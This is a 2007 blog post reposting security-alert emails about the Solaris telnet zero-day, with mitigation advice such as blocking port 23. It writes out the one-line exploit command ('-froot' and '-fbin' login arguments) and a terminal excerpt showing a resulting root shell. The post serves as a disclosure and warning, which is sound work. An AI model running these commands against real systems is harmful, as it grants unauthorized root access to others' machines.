Sunday, February 11, 2007

[Dshield] Solaris Telnet 0-day (Important!)

This morning , I received email from Dshiled about Solaris Telnet 0-day. The article about this issue:
https://isc.sans.org/diary.html?storyid=2220

You also can read this email:
Email 1:
If you run Solaris, please check if you got telnet enabled NOW. If you
can, block port 23 at your perimeter. There is a fairly trivial Solaris
telnet 0-day.

telnet -l "-froot" [hostname]

will give you root on many Solaris systems with default installs
We are still testing. Please use our contact form at
https://isc.sans.org/contact.html
if you have any details about the use of this exploit.

Email 2:
On systems where the above fails with "Not on system console",
don't assume that the machine is secure, because the following does work,
and is one step from root:
 telnet -l "-fbin" [hostname]
The above is from my testing with Solaris 10, so get ready to start
kicking...

Email 3:
HD is not 100% accurate.  It can be -froot   if and only if you have
commented  the CONSOLE setting within /etc/default/login .  This
setting prevents network logons to root account and is set by
default.  However, I have seen some admins comment it out as they had
been able to do logins to the root account in other unix or linux
distributions.   Below is an excerpt for a test on a system that has
that setting commented.

% telnet -l "-froot" 192.168.1.1
Trying 192.168.1.1...
Connected to somehost (192.168.1.1.).
Escape character is '^]'.
Last login: Sun Feb 11 15:08:17 from myhost
Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
# id
uid=0(root) gid=0(root)

With the console setting in its default state you get the below

% telnet -l "-froot" 192.168.1.1
Trying 192.168.1.1...
Connected to somehost (192.168.1.1.).
Escape character is '^]'.
Not on system console
Connection closed by foreign host.

If you try userids with non standard shells  such as /bin/false or
one similar to the one in the jass package will also kick the end
user out.  Users that have been locked  (passwd -l userid ) will also
be booted out with a "Login incorrect" message.
Hope this helps everyone understand how much risk they have.
Scott

That's why i don't like to use Solaris......hehehehe....
Posted by Johncrackernet at 9:06 PM
Labels: ,

1 comment:

Anonymous said...

Your blog keeps getting better and better! Your older articles are not as good as newer ones you have a lot more creativity and originality now keep it up!

2:08 AM

Post a Comment

Subscribe to: Post Comments (Atom)